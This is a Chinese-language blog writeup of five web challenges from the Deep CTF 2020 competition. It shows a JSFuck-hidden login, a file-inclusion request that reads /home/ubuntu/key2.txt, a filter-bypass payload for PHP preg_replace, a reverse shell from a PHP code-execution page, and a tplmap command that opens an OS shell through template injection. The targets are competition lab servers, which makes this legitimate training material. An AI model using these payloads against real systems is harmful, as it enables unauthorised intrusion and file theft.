🇮🇳Deep CTF 2020 Writeup 2 min read
本文最后更新于 558 天前,其中的信息可能已经有所发展或是发生改变。

Author:颖奇L’Amore

Blog:www.gem-love.com

这比赛没上CTFTime,所以可能没什么人知道,我是被认识的国际友人拉过去打的

When you feel that you are lost, do not give up, fight and move on. Being a hacker is not easy, it requires effort and sacrifice. But remember … we are legion!


Oh JS!(120pt)

This is the most secure login form on earth.

We use SECURITY BY OBSCURITY in order to prevent hackers from finding our flags.

I dare you to login.

http://140.238.254.6:8002

Author: whitex

考点:JS Fuck

难度:baby

打开题目需要登录,查看源代码发现JS Fuck,解得:

if (document.forms[0].username.value == "corb3nik" && document.forms[0].password.value == "chickenachos") document.location = "4d4932602a75414640946d38ea6fefbf.php"

于是直接访问4d4932602a75414640946d38ea6fefbf.php得到flag:d33p{g0tta_kn0w_y0ur_J4v4Scr1pt}


Did You Got Trolled?(120pt)

An army of hackers has stolen the flag from our rabbits. Security experts have failed to capture the flag and some have even gone mad.

Please…GIMME THE FLAG!!

http://140.238.254.6:8005

Author: whitex

考点:Recon

难度:搞事

没做出来,一直差一步,没找到key1,这是难度第二简单的题,solve数却是最低的,可能大家都和我一样没找到key1

首先在robots.txt得知deep.php,访问 这样的:

考虑存在文件包含,在这个页面有个注释:

<!--Creds in /home/ubuntu/key2.txt -->

所以先把这个key2读出来

/deep.php?page=/home/ubuntu/key2.txt

key2 = flag0x085927

但是Key1怎么也找不到,后来开始看css,在clean-blog.css中发现如下注释:

/* 
 * What is this doing here?
 * Key1 = gimme0x038792
 * 
 */

带着key去generate:

点击GENERATE得到flag:D33P{h3r3_1s_y0ur_7r0ll_fl4g}


Magic Word!(150pt)

Are you mad enough to get the flag?

http://140.238.254.6:8004/

Author: whitex

考点:PHP

难度:简单

做过原题,忘了是哪个国外比赛的了,这题和原题格式什么的都一样,只是换了个名,给了源码:

<?php
  require("flag.php");

  if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    die();
  }

  if (isset($_GET['magic_word'])) {

    $what_he_said = $_GET['magic_word'];
    $what_you_dont_want_to_hear = 'd33p';
    $what_you_actually_heard = preg_replace(
            "/$what_you_dont_want_to_hear/", '', $what_he_said);

    if ($what_you_actually_heard === $what_you_dont_want_to_hear) {
      get_mad_and_give_flag();
    }
  }
?>

双写绕过即可:

?magic_word=d3d33p3p

flag:d33p{d33p_p33d}


Nothing is Impossible(160pt)

One of our rabbits has lost the keys of his server to access his flag. He is crying desperately as he only remembers that the flag was in the path: /tmp/flag.php but he dont know how to get there. Our friend BugsBunny was performing reconnaissance tasks when suddently found a web that could help you, please bring me back his flag.

Author; whitex

http://140.238.254.6:8003

考点:RCE

难度:简单

题目是个PHP在线代码执行,告知了flag在/tmp/flag.php,但是直接show_source()读不出来,system()然后cat也读不出来

反弹个shell,得到flag:d33p{f4st_CG1_SSRF_p0w3r!!}


Greetings!(200pt)

Feed your ‘name’ to the website and hack!

http://140.238.254.6:8011

Author: SherlockHolmes

考点:SSTI

难度:简单

发现模板注入

丢进TPLMAP一把梭,然后检测出blind shell,弹个shell回来:

sudo python tplmap.py -u http://140.238.254.6:8011/\?name\= --os-shell

这个shell会马上断开,打开只有20秒,所以弹回来要马上读取flag才行

flag:d33p{I_<3_3000}

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/ctf/2232.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

暂无评论

发送评论 编辑评论

上一篇
下一篇